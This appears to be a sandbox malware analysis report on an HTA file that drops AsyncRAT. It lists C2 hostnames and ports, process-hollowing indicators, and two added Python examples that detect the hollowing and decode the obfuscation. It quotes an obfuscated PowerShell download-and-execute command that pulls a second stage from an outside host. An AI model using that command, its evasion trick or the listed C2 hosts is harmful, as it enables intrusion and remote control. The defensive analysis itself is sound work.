Analysis
max time kernel: 143s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 06-07-2022 02:22
Static task: static1
Behavioral task: behavioral1
Sample: 0eaee4c07ea1b88a8e5d044006b42d41.hta
Resource: win7-20220414-en
General
Target: 0eaee4c07ea1b88a8e5d044006b42d41.hta
Size: 1KB
MD5: 0eaee4c07ea1b88a8e5d044006b42d41
SHA1: 62fe6a825728c186335fc2a24f24f0608519cdff
SHA256: 2693749e9e3f7c99543e3e622a335a9db30dc604808f06e3a51f20c33bac8af2
SHA512: 61ea582878866c4a5ac0cff1cfa4a8e59731396a25df430382bee11eedd4c0d942c81fc8c0d375027f45106e1dcff14910ce63e9a2c5b85451b0bd68e7a1311f
Malware Config
Extracted
https://unimed-corporated.com/updata.jpg
Extracted
asyncrat
3LOSH RAT
#_AVAST_#
cdtpitbull.hopto.org:7707
cdtpitbull.hopto.org:4404
cdtpitbull.hopto.org:5505
cdtpitbull.hopto.org:3303
cdtpitbull.hopto.org:2222
cdtpitbull.hopto.org:6606
cdtpitbull.hopto.org:8808
cdtpitbull.hopto.org:5155
cdtpitbull.hopto.org:5122
cdtpitbull.hopto.org:8001
cdtpitbull.hopto.org:9000
cdtpitbull.hopto.org:9999
cdtpitbull.hopto.org:8888
chromedata.accesscam.org:7707
chromedata.accesscam.org:4404
chromedata.accesscam.org:5505
chromedata.accesscam.org:3303
chromedata.accesscam.org:2222
chromedata.accesscam.org:6606
chromedata.accesscam.org:8808
chromedata.accesscam.org:5155
chromedata.accesscam.org:5122
chromedata.accesscam.org:8001
chromedata.accesscam.org:9000
chromedata.accesscam.org:9999
chromedata.accesscam.org:8888
datacontrol.ddns.net:7707
datacontrol.ddns.net:4404
datacontrol.ddns.net:5505
datacontrol.ddns.net:3303
datacontrol.ddns.net:2222
datacontrol.ddns.net:6606
datacontrol.ddns.net:8808
datacontrol.ddns.net:5155
datacontrol.ddns.net:5122
datacontrol.ddns.net:8001
datacontrol.ddns.net:9000
datacontrol.ddns.net:9999
datacontrol.ddns.net:8888
cdt2023.ddns.net:7707
cdt2023.ddns.net:4404
cdt2023.ddns.net:5505
cdt2023.ddns.net:3303
cdt2023.ddns.net:2222
cdt2023.ddns.net:6606
cdt2023.ddns.net:8808
cdt2023.ddns.net:5155
cdt2023.ddns.net:5122
cdt2023.ddns.net:8001
cdt2023.ddns.net:9000
cdt2023.ddns.net:9999
cdt2023.ddns.net:8888
mutex: AsyncMutex_6SI8OkPnk
delay: 3
install: false
install_file: DesbravadorUpdata.exe
install_folder: %AppData%
Signatures
Async RAT payload (1 IoC)
  resource: behavioral2/memory/4384-143-0x0000000000400000-0x0000000000412000-memory.dmp
  yara_rule: asyncrat
Blocklisted process makes network request (1 IoC)
  flow 17, PID 3672, powershell.exe
Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation (mshta.exe)
Suspicious use of SetThreadContext (1 IoC)
  PID 3672 powershell.exe set thread context of PID 4384 aspnet_compiler.exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious behavior: EnumeratesProcesses (6 IoCs)
  PID 3672 powershell.exe (6 occurrences)
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, PID 3672 powershell.exe
Suspicious use of WriteProcessMemory (17 IoCs)
  PID 4220 mshta.exe wrote to memory of PID 3672 powershell.exe (3 times)
  PID 3672 powershell.exe wrote to memory of PID 4608 aspnet_compiler.exe (3 times)
  PID 3672 powershell.exe wrote to memory of PID 4500 aspnet_compiler.exe (3 times)
  PID 3672 powershell.exe wrote to memory of PID 4384 aspnet_compiler.exe (8 times)
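The WriteProcessMemory and SetThreadContext entries above are the classic process-hollowing sequence: powershell.exe (PID 3672) spawns a legitimate, Microsoft-signed .NET binary (aspnet_compiler.exe), writes into it, then redirects a thread, and the asyncrat YARA rule fires on that child's memory at 0x400000 (the usual 32-bit image base) in PID 4384. The mshta.exe writes into powershell.exe (4220 to 3672) are what any parent does to a child it has just created, so writes alone are weak evidence; the SetThreadContext is the discriminator. The following is an added example, not part of the Triage report and not code from the sample: it correlates constructed API events shaped after the IoCs above into a per-target verdict. The event layout, the placeholder ppid for mshta.exe and the watchlists of script hosts and hollowing hosts are assumptions.

```python
"""Correlate the WriteProcessMemory / SetThreadContext IoCs into a hollowing verdict.

Added example, not part of the Triage report and not code from the sample. The
process table and API events below are constructed from the PIDs and image
paths in the Signatures section; the tuple/dict layout is an assumed shape,
not Triage's export format.
"""
from collections import defaultdict

# Constructed process table: pid -> (ppid, image). The ppid of mshta.exe is not
# in the report; 1000 is a placeholder.
PROCESSES = {
    4220: (1000, r"C:\Windows\SysWOW64\mshta.exe"),
    3672: (4220, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"),
    4608: (3672, r"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"),
    4500: (3672, r"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"),
    4384: (3672, r"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"),
}

# Constructed API events mirroring the 17 WriteProcessMemory IoCs and the one
# SetThreadContext IoC: (api, source_pid, target_pid).
API_EVENTS = (
    [("WriteProcessMemory", 4220, 3672)] * 3
    + [("WriteProcessMemory", 3672, 4608)] * 3
    + [("WriteProcessMemory", 3672, 4500)] * 3
    + [("WriteProcessMemory", 3672, 4384)] * 8
    + [("SetThreadContext", 3672, 4384)]
)

# Script hosts that have no business writing code into other processes.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Signed .NET framework binaries commonly used as hollowing hosts (assumed
# watchlist; aspnet_compiler.exe is the one this sample uses).
HOLLOW_HOSTS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def correlate(processes, events):
    """Return {target_pid: (verdict, source_pid, write_count)}.

    A parent writes into every child it creates (the 4220 -> 3672 writes are
    just CreateProcess), so writes alone are weak evidence. The discriminator
    is the same source also calling SetThreadContext on the target: that is
    the suspended-create / write / set-context / resume hollowing sequence.
    """
    writes = defaultdict(int)
    context_changed = set()
    for api, src, dst in events:
        if api == "WriteProcessMemory":
            writes[(src, dst)] += 1
        elif api == "SetThreadContext":
            context_changed.add((src, dst))

    verdicts = {}
    for (src, dst), count in writes.items():
        if basename(processes[src][1]) not in SCRIPT_HOSTS:
            continue
        if basename(processes[dst][1]) not in HOLLOW_HOSTS:
            continue
        verdict = "hollowed" if (src, dst) in context_changed else "written"
        verdicts[dst] = (verdict, src, count)
    return verdicts


def ancestry(processes, pid):
    """Image names from the outermost known ancestor down to pid."""
    chain = []
    while pid in processes:
        chain.append(basename(processes[pid][1]))
        pid = processes[pid][0]
    return chain[::-1]


if __name__ == "__main__":
    for dst, (verdict, src, count) in sorted(correlate(PROCESSES, API_EVENTS).items()):
        print(f"{verdict:9} pid {dst} <- pid {src} ({count} writes); chain: "
              + " -> ".join(ancestry(PROCESSES, dst)))
```

Run against these events, PID 4384 comes out as "hollowed" while 4608 and 4500, which were written to but never had a thread context changed, come out as "written" only, and PID 3672 is not flagged at all because powershell.exe is not on the hollowing-host list. On a real host the same logic would run over Sysmon or EDR API telemetry rather than a constructed list.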
Processes
C:\Windows\SysWOW64\mshta.exe
  command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0eaee4c07ea1b88a8e5d044006b42d41.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command [void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),[Microsoft.VisualBasic.CallType]::Method,'+++++++++++++++++++++++++++++################'.Replace('+++++++++++++++++++++++++++++','https://un').Replace('################','imed-corporated.com/updata.jpg'))|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname
    - Blocklisted process makes network request
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
      command line: "C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
    C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
      command line: "C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
    C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
      command line: "C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
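The PowerShell command line in the tree above never contains the strings "DownloadString" or the C2 URL: it builds both with .replace() chains and then invokes the WebClient method late-bound through [Microsoft.VisualBasic.Interaction]::CallByName, so keyword-based command-line rules miss it (the System32 path in the command line versus the SysWOW64 image path is WoW64 file-system redirection, the 32-bit mshta.exe host launching a 32-bit PowerShell). The chains are static, so they can be resolved without running anything. The following is an added example, not part of the report and not code from the sample: it parses 'literal'.replace(a,b) chains out of a reconstructed copy of the captured command and applies them in Python. The sample string is rebuilt from the process tree above with the filler runs of '+' and '#' factored into constants; their exact length is irrelevant, only that both occurrences of each run match, as they do in the capture.

```python
"""Statically resolve the string-building in the captured PowerShell command.

Added example, not part of the report and not code from the sample. Instead
of executing the script, it applies the same 'literal'.replace(a,b)... chains
in Python, which is enough to recover the method name and the URL.
"""
import re

# Filler runs used by the obfuscation. Their length is irrelevant to the
# technique; what matters is that both occurrences of a run are identical,
# as they are in the capture, so they are kept as constants here.
PLUS = "+" * 29
HASH = "#" * 16

# Reconstructed from the command line in the process tree above. The report
# cuts the capture off after the second CallByname, so the sample ends there too.
SAMPLE = (
    "[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');"
    "$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),"
    "'Dow__lo--tri__g'.replace('__','n').replace('--','adS'),"
    "[Microsoft.VisualBasic.CallType]::Method,"
    f"'{PLUS}{HASH}'.Replace('{PLUS}','https://un')"
    f".Replace('{HASH}','imed-corporated.com/updata.jpg'))|IEX;"
    "[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname"
)

# PowerShell single-quoted literal: no escapes except a doubled quote.
LITERAL = r"'((?:[^']|'')*)'"
# One .replace('old','new') call; PowerShell method names are case-insensitive.
CALL_RE = re.compile(r"\s*\.replace\(\s*" + LITERAL + r"\s*,\s*" + LITERAL + r"\s*\)", re.IGNORECASE)
# A literal followed by one or more .replace() calls.
CHAIN_RE = re.compile(LITERAL + r"((?:" + CALL_RE.pattern + r")+)", re.IGNORECASE)


def _unquote(s):
    return s.replace("''", "'")


def _resolve(match):
    """Apply every .replace() in the chain to the leading literal, in order."""
    value = _unquote(match.group(1))
    for call in CALL_RE.finditer(match.group(2)):
        value = value.replace(_unquote(call.group(1)), _unquote(call.group(2)))
    return value


def resolve_chains(cmd):
    """[(obfuscated literal, resolved value), ...] for every replace chain."""
    return [(m.group(1), _resolve(m)) for m in CHAIN_RE.finditer(cmd)]


def deobfuscate(cmd):
    """Rewrite the command with each chain collapsed to its resolved literal."""
    return CHAIN_RE.sub(lambda m: "'" + _resolve(m).replace("'", "''") + "'", cmd)


def indicators(cmd):
    """Pull out what a triage analyst wants from the resolved command."""
    clean = deobfuscate(cmd)
    return {
        "urls": re.findall(r"https?://[^\s'\"()]+", clean),
        # CallByName invokes the WebClient method by a string name at run time,
        # so 'DownloadString' never appears in the raw command line.
        "late_bound_call": bool(re.search(r"\[Microsoft\.VisualBasic\.Interaction\]::CallByName", clean, re.I)),
        "downloads_and_executes": "DownloadString" in clean and bool(re.search(r"\|\s*IEX\b", clean, re.I)),
    }


if __name__ == "__main__":
    for raw, value in resolve_chains(SAMPLE):
        print(f"{raw!r} -> {value!r}")
    print(indicators(SAMPLE))
```

The two chains resolve to DownloadString and https://unimed-corporated.com/updata.jpg, the same URL Triage lists under Malware Config; the downloaded text is piped to IEX, so updata.jpg is a second-stage script, not an image. The resolver only handles literal .replace() chains; a variant that splits strings with -join or -f formatting needs the equivalent operator added, but the approach of evaluating pure string operations without ever running the script stays the same.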
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
memory/3672-136-0x0000000005E20000-0x0000000005E3E000-memory.dmp (120KB)
memory/3672-130-0x0000000000000000-mapping.dmp
memory/3672-132-0x0000000004F30000-0x0000000005558000-memory.dmp (6.2MB)
memory/3672-133-0x0000000005590000-0x00000000055B2000-memory.dmp (136KB)
memory/3672-134-0x00000000056B0000-0x0000000005716000-memory.dmp (408KB)
memory/3672-135-0x00000000057D0000-0x0000000005836000-memory.dmp (408KB)
memory/3672-131-0x00000000048C0000-0x00000000048F6000-memory.dmp (216KB)
memory/3672-137-0x0000000006E80000-0x0000000006F1C000-memory.dmp (624KB)
memory/3672-138-0x0000000007950000-0x0000000007FCA000-memory.dmp (6.5MB)
memory/3672-139-0x0000000006E40000-0x0000000006E5A000-memory.dmp (104KB)
memory/4384-142-0x0000000000000000-mapping.dmp
memory/4384-143-0x0000000000400000-0x0000000000412000-memory.dmp (72KB)
memory/4500-141-0x0000000000000000-mapping.dmp
memory/4608-140-0x0000000000000000-mapping.dmp